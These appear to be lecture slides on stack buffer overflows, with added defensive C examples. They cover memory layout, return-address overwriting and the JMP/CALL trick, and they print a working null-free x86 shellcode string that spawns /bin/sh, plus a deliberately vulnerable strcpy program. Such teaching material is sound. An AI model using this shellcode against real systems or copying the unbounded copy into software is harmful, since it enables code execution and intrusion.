Buffer_Overflow

Transcript of Buffer_Overflow

8/7/2019 Buffer_Overflow

http://slidepdf.com/reader/full/bufferoverflow 1/24

Buffer Overflow
By Mahtab Alam


Stack Buffer Overflow Basics

A process in memory:

- text (Program code; marked read-only, so any attempt to write to it will result in a segmentation fault)
- data segment (Global and static variables)
- stack (Dynamic variables)

The process is blocked and is rescheduled to run again with a larger memory space if the user stack exhausts available memory.

[Figure: process memory layout, lower memory addresses at the top, higher memory addresses at the bottom]


Stack Basics

A stack is a contiguous block of memory containing data.

Stack pointer (SP) - a register that points to the top of the stack. The bottom of the stack is at a fixed address.

Its size is dynamically adjusted by the kernel at run time.

The CPU implements instructions to PUSH onto and POP off the stack.


Stack BasicsStack Basics

A stack consists of logical stackA stack consists of logical stackframes that are pushed whenframes that are pushed whencalling a function and popped whencalling a function and popped whenreturning.returning. Frame pointer (FP)Frame pointer (FP) ±± points to apoints to afixed location within a frame.fixed location within a frame.

When a function is called, theWhen a function is called, thereturn address, stack frame pointerreturn address, stack frame pointerand the variables are pushed onand the variables are pushed onthe stack (in that order).the stack (in that order).

So the return address has a higherSo the return address has a higheraddress as the buffer.address as the buffer.

When we overflow the buffer, theWhen we overflow the buffer, thereturn address will be overwritten.return address will be overwritten.

High memoryaddresses

Lower memoryaddresses


Example Code

void function() {
    ...
    return;
}

int main(void) {
    ...
    function();   /* the original read "Function();" - C is case-sensitive, so the call must match the definition */
    ...
}


Another Example Code

void function(int a, int b, int c) {
    char buffer1[5];
    char buffer2[10];
}

int main(void) {
    function(1, 2, 3);
    return 0;
}


Stack layout for the example code

bottom of                                              top of
memory                                                 memory

       buffer2     buffer1  sfp   ret   a     b     c
<---- [          ][       ][    ][    ][    ][    ][    ]

top of                                                 bottom of
stack                                                  stack
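As an added example (not from the original slides and not the author's code), the C program below checks at run time the two layout facts the diagram relies on: a called function's frame sits at a lower address than its caller's, and a local buffer sits below the slot holding the saved frame pointer and return address, so writing past the end of the buffer runs towards them. It uses GCC/Clang's __builtin_frame_address and assumes a downward-growing stack with locals placed below the frame pointer, as on x86-64 and AArch64 Linux; the function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if the local buffer lies at a lower address than this function's
 * frame-pointer slot (the return address is saved just above it), else 0.
 * Assumes locals are placed below the saved frame pointer (x86-64/AArch64). */
__attribute__((noinline))
int buffer_below_frame(void)
{
    char buffer[16];
    volatile char *keep = buffer;   /* stop the compiler from dropping the buffer */
    memset(buffer, 'A', sizeof buffer);
    uintptr_t buf_addr = (uintptr_t)keep;
    uintptr_t frame = (uintptr_t)__builtin_frame_address(0);
    return buf_addr < frame;
}

/* Helper: compares the callee's own frame address with the caller's. */
__attribute__((noinline))
int callee_frame_is_lower(uintptr_t caller_frame)
{
    uintptr_t mine = (uintptr_t)__builtin_frame_address(0);
    return mine < caller_frame;
}

/* Returns 1 if a new frame is pushed below the caller's (stack grows down). */
__attribute__((noinline))
int frames_grow_downward(void)
{
    uintptr_t here = (uintptr_t)__builtin_frame_address(0);
    /* The volatile store after the call keeps the compiler from turning the
     * call into a tail jump, which would reuse this frame for the callee. */
    volatile int result = callee_frame_is_lower(here);
    return result;
}

int main(void)
{
    printf("local buffer below saved fp/ret: %s\n", buffer_below_frame() ? "yes" : "no");
    printf("callee frame below caller frame: %s\n", frames_grow_downward() ? "yes" : "no");
    return 0;
}
```

Both checks answer "yes" on a conventional downward-growing stack, which is exactly why a copy that runs off the end of buffer1 or buffer2 reaches sfp and ret rather than harmless memory; compilers that reorder locals or insert a stack canary change what gets overwritten first, not this direction.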


General Form of Security Attack Achieves Two Goals:

1. Inject the attack code, which is typically a small sequence of instructions that spawns a shell, into a running process.

2. Change the execution path of the running process to execute the attack code.

Overflowing stack buffers can achieve both goals simultaneously.


How can we place arbitrary instructions into its address space?

- Place the code that you are trying to execute in the buffer we are overflowing, and overwrite the return address so it points back into the buffer.


We want:

bottom of                                                 top of
memory                                                    memory

       DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF
       89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF
       buffer                sfp   ret   a     b     c

<---- [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
       ^                             |
       |_____________________________|

top of                                                    bottom of
stack                                                     stack


[Figure: (i) before the attack; (ii) after injecting the attack code]


[Figure: (iii) executing the attack code]


Shellcode.c

#include <stdio.h>
#include <unistd.h>   /* execve() */

int main(void) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}


After compiling the code and starting up gdb, we have the shellcode in assembly:


Some modifications to the shellcode:

We want the program to exit cleanly if the execve syscall fails. We add exit(0); as the last line in the code.


Our list of steps:

- Have the null terminated string "/bin/sh" somewhere in memory.
- Have the address of the string "/bin/sh" somewhere in memory followed by a null long word.
- Copy 0xb into the EAX register.
- Copy the address of the address of the string "/bin/sh" into the EBX register.
- Copy the address of the string "/bin/sh" into the ECX register.
- Copy the address of the null long word into the EDX register.
- Execute the int $0x80 instruction.
- Copy 0x1 into the EAX register.
- Copy 0x0 into the EBX register.
- Execute the int $0x80 instruction.

Trying to put this together in Assembly language, we have:

movl string_addr,string_addr_addr
movb $0x0,null_byte_addr
movl $0x0,null_addr
movl $0xb,%eax
movl string_addr,%ebx
leal string_addr,%ecx
leal null_string,%edx
int $0x80
movl $0x1, %eax
movl $0x0, %ebx
int $0x80
/bin/sh string goes here.

Then, place the string after the code.


Problem:

We don't know where in the memory space of the program we're trying to exploit the code (and the string that follows it) will be placed.

Solution:

- Place a CALL instruction right before the "/bin/sh" string, and a JMP instruction to it.
- The string's address will be pushed onto the stack as the return address when CALL is executed. (Basically, the CALL instruction pushes the IP onto the stack.)


Inserting JMP and CALL instructions

bottom of                                                 top of
memory                                                    memory

       DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF
       89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF
       buffer                sfp   ret   a     b     c

<---- [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
       ^|^             ^|            |
       |||_____________||            |   (2) JMP forward to the CALL
       | |______________|            |   (3) CALL back to the start of the code (pushes the string's address)
       |_____________________________|   (1) overwritten ret points at the JMP

top of                                                    bottom of
stack                                                     stack


Running the shellcode

We must place the code we wish to execute in the stack or data segment.

(Recall: the text region of a process is marked read-only.)

To do so, we'll place our code in a global array in the data segment. We need the hex representation of the binary code.
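Whether this step still works depends on how the loader maps the stack and data: current toolchains mark the stack non-executable through the ELF PT_GNU_STACK program header (readelf -lW shows it as RW rather than RWE, and gcc -z noexecstack forces it), and the kernel honours that flag when it maps the process. As an added example that is not part of the original slides, the C code below parses that header from a 64-bit little-endian ELF image held in memory and reports whether the stack would be executable. The images it checks are constructed in-line (a bare header plus one program header, not real binaries) so the check runs offline; the function names and result codes are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PT_LOAD      1u
#define PT_GNU_STACK 0x6474e551u   /* program-header type the linker uses for stack permissions */
#define PF_X         0x1u          /* executable bit in p_flags */

/* Return codes of gnu_stack_executable() (this example's own convention). */
enum { STACK_NOEXEC = 0, STACK_EXEC = 1, STACK_NO_HEADER = -1, STACK_BAD_ELF = -2 };

static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint64_t rd64(const unsigned char *p) { return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32); }

/* Walks the program headers of a little-endian ELF64 image and reports the
 * PT_GNU_STACK permission, or why it could not. */
int gnu_stack_executable(const unsigned char *img, size_t len)
{
    /* e_ident: magic, ELFCLASS64 (2), ELFDATA2LSB (1); e_phoff at 0x20,
     * e_phentsize at 0x36, e_phnum at 0x38. */
    if (len < 64 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[4] != 2 || img[5] != 1)
        return STACK_BAD_ELF;
    uint64_t phoff = rd64(img + 0x20);
    uint16_t phentsize = rd16(img + 0x36);
    uint16_t phnum = rd16(img + 0x38);
    if (phentsize < 56 || phoff > len || (uint64_t)phnum * phentsize > len - phoff)
        return STACK_BAD_ELF;           /* program-header table would run past the image */
    for (uint16_t i = 0; i < phnum; i++) {
        const unsigned char *ph = img + phoff + (size_t)i * phentsize;
        if (rd32(ph) == PT_GNU_STACK)   /* p_type at offset 0, p_flags at offset 4 */
            return (rd32(ph + 4) & PF_X) ? STACK_EXEC : STACK_NOEXEC;
    }
    return STACK_NO_HEADER;             /* header absent: the loader falls back to its default */
}

/* Builds a constructed ELF64 image: 64-byte header plus one program header of
 * the given type and flags. Returns the image length (120 bytes). */
size_t build_image(unsigned char *out, uint32_t p_type, uint32_t p_flags)
{
    memset(out, 0, 120);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = 2;                 /* ELFCLASS64 */
    out[5] = 1;                 /* little-endian */
    out[0x20] = 64;             /* e_phoff = 64 */
    out[0x36] = 56;             /* e_phentsize */
    out[0x38] = 1;              /* e_phnum */
    unsigned char *ph = out + 64;
    for (int i = 0; i < 4; i++) {
        ph[i] = (unsigned char)(p_type >> (8 * i));       /* p_type, little-endian */
        ph[4 + i] = (unsigned char)(p_flags >> (8 * i));  /* p_flags, little-endian */
    }
    return 120;
}

int main(void)
{
    unsigned char img[120];
    size_t n = build_image(img, PT_GNU_STACK, 0x6);   /* RW: what -z noexecstack produces */
    printf("RW  stack header -> %d\n", gnu_stack_executable(img, n));
    n = build_image(img, PT_GNU_STACK, 0x7);          /* RWE: executable stack */
    printf("RWE stack header -> %d\n", gnu_stack_executable(img, n));
    return 0;
}
```

On a real binary the same test is one command: readelf -lW ./a.out | grep GNU_STACK. A result of RW means code copied into a stack buffer faults when jumped to, so the diagrams on the following slides describe an executable-stack build only; a binary that links with an RWE stack (or lacks the header entirely) is what to look for when auditing.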


shellcodeasm.cshellcodeasm.c


Obstacle: There must be no null bytes in the shellcode for the exploit to work.

Reason: null bytes in our shellcode will be considered the end of the string; the copy will be terminated when encountering the null character.

After eliminating null bytes, shellcode in hex representation (Note: different hardware architectures have different hex representations of binary code):

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";


vulnerable.c

#include <string.h>

int main(int argc, char *argv[]) {
    char buffer[512];

    if (argc > 1)
        strcpy(buffer, argv[1]);   /* unbounded copy: an argv[1] longer than 511 bytes overruns the buffer */
    return 0;
}
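The strcpy above copies until it finds a terminator, however long argv[1] is. As an added example that is not part of the original slides, the C code below puts a bounded replacement beside it: copy_arg_checked refuses any input that does not fit together with its terminator, handle_arg is the vulnerable.c main() body with that copy in place, and would_overflow reports whether a given argument would have overrun the original 512-byte buffer. The function names and the 600-byte input are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* same buffer size as vulnerable.c */

/* Returns 1 if strcpy of arg into a buffer of bufsz bytes would write past
 * its end (the terminator needs a byte too), else 0. */
int would_overflow(const char *arg, size_t bufsz)
{
    return strlen(arg) + 1 > bufsz;
}

/* Bounded copy: returns 0 and fills dst on success, -1 when src has no
 * terminator within dstsz bytes (too long to fit). Never touches more than
 * dstsz bytes of either buffer. */
int copy_arg_checked(char *dst, size_t dstsz, const char *src)
{
    const char *end = memchr(src, '\0', dstsz);   /* look for the terminator within bounds only */
    if (end == NULL)
        return -1;
    memcpy(dst, src, (size_t)(end - src) + 1);    /* includes the terminator */
    return 0;
}

/* vulnerable.c's main() body with the bounded copy. Returns the copy result
 * (0 accepted, -1 rejected); 0 when there is no argument, since the original
 * does nothing in that case. */
int handle_arg(const char *arg)
{
    char buffer[BUF_SIZE];
    if (arg == NULL)
        return 0;
    return copy_arg_checked(buffer, sizeof buffer, arg);
}

int main(int argc, char *argv[])
{
    /* Constructed inputs: a short string and a 600-byte run of 'A'. */
    char big[600];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("\"hello\": overflow=%d checked=%d\n", would_overflow("hello", BUF_SIZE), handle_arg("hello"));
    printf("600 x 'A': overflow=%d checked=%d\n", would_overflow(big, BUF_SIZE), handle_arg(big));
    if (argc > 1)
        printf("argv[1]: overflow=%d checked=%d\n", would_overflow(argv[1], BUF_SIZE), handle_arg(argv[1]));
    return 0;
}
```

The rejected case is what matters: the 600-byte argument that would have overwritten sfp and ret in vulnerable.c is turned away with no write at all, and the check is made against the destination's size rather than by trusting the source's length, which is the pattern to look for when reviewing any strcpy, strcat or sprintf into a fixed-size stack buffer.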


The End